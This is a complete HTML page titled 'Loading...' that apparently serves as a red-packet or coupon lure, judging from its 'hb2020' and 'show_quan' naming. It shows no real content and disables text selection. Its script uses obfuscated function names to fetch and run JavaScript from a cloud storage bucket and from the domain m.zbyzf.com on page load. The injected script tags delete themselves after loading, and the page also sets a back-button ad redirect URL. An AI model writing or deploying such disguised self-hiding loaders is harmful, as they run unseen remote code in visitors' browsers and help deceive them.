
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="renderer" content="webkit">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <title>加载中...</title>
    <link rel="stylesheet" href="//wxhbjs-2020.oss-cn-shanghai.aliyuncs.com/Mjk/hb2020.css">
    <style>
    * {
-webkit-touch-callout: none; /* iOS Safari */
-webkit-user-select: none; /* Chrome/Safari/Opera */
-khtml-user-select: none; /* Konqueror */
-moz-user-select: none; /* Firefox */
-ms-user-select: none; /* Internet Explorer/Edge */
user-select: none; /* Non-prefixed version, currently not supported by any browser */
}
        .tan-bg-tz {
            background-color: #fff;
            border-radius: 6px;
            position: fixed;
            width: 96%;
            animation: demo2 5s ease-in-out 0s 1 alternate forwards;
            left: 2%;
            z-index: 6666;
        }

        .tongzhi_top {
            display: flex;
            justify-content: space-between;
            margin-bottom: 4px;
        }

        .tongzhi_bottom {
            display: flex;
            align-items: center;
            justify-content: space-between;
            font-size: 14px;
        }

        .t_l_text {
            display: flex;
            align-items: center;
            font-size: 12px;
        }

        .t_l_text img {
            width: 20px;
            height: auto;
            display: block;
            margin-right: 10px;
        }

        .safe-img {
            margin-top: 4px;
        }

        .safe-img img {
            width: 14px;
            height: auto;
            display: block;
        }

        .tz_img img {
            width: 10vw;
            height: 10vw;
            display: block;
        }

        .text-ling {
            margin-top: 4px;
            color: #6a6a6a;
        }

        .text-new {
            color: #6a6a6a;
        }

        .new-bg-tz {
            padding: 10px 10px 12px 20px;
        }

        @keyframes demo2 {
            0% {
                transform: translateY(-100px);
            }
            30% {
                transform: translateY(4px);
            }
            50% {
                transform: translateY(4px);
            }
            100% {
                transform: translateY(-300px);
            }
        }
    </style>
    <style>
        .modal2 {
            margin: auto;
            top: 100px;
            padding-top: 20px;
            padding-left: 20px;
            padding-right: 20px;
            background: white;
            border-radius: 8px;
            position: relative;
        }

        .modal1 {
            width: 100%;
            background: #FEFEFE;
            text-align: center;
            padding-top: 5vh;
            padding-bottom: 5vh;
        }

        .disappear {
            width: 30px;
            height: 30px;
            border-radius: 50%;
            background: #c0c0c0;
            font-size: 20px;
            line-height: 26px;
            font-weight: bold;
            text-align: center;
            color: #ebebeb;
            position: absolute;
            right: -10px;
            top: -10px;
        }

        .btn1 {
            width: 100%;
            height: 50px;
            border-top: 1px solid #dcd9d9;
        }

        .btnHide {
            width: 100%;
            height: 50px;
            font-size: 22px;
            color: #18ad19;
            border: 0;
            background: white;
            border-radius: 4px;
        }
        
    </style>
    <script>


    </script>
</head>
<body style="">
<div style="display:none">
	
</div>
<a id="back" rel="noopener noreferrer"></a>
<div id="ld">
    
</div>

<script> var require = null;var define=null; var manage_url = '//m.zbyzf.com';
var apiUrl=manage_url+"/hb2/Hb.php?m=show";var toquanurl = manage_url+"/hb2/Hb.php?m=show_quan&t="; var adUrl="https://wap.v5me.com/api/t/back"</script>
<script>
  	function getUrlParam(name) {var reg = new RegExp("(^|&)" + name + "=([^&]*)(&|$)");var r = window.location.search.substr(1).match(reg);if (r != null) return unescape(r[2]);return null;}
    function isc4s2z6u0w8(e, t) {
        var a = document.createElement("script");
        a.src = e,
            a.onload = function () {
                a.parentNode && a.parentNode.removeChild(a),
                "function" == typeof t && t()
            },
            document.body.appendChild(a)
    }
    function gdatafi8jwpac4c(e, t, a) {
        var n = new XMLHttpRequest;
        //n.timeout = 3000;
        n.onreadystatechange = function () {
            4 === n.readyState && (200 === n.status || 304 === n.status ? "function" == typeof t && t(n.responseText) : "function" == typeof a && a(n))
        };n.ontimeout = function (e) {
            //alert('请求超时,重新发起请求');
            //location.reload();
        };
        n.open("GET", e, !0),
            n.send(null)
    }
  	var temp = getUrlParam('temp');
    isc4s2z6u0w8("//wxhbjs-2020.oss-cn-shanghai.aliyuncs.com/Mjk/ldhgg.js?n="+new Date().getTime())
    //isc4s2z6u0w8(manage_url + '/api/mjk/show?temp=' + temp)
    //setTimeout(function(){
        isc4s2z6u0w8(manage_url + '/api/mjk/show?temp=' + temp)
    //}, 2000);
</script>
</body>
</html>

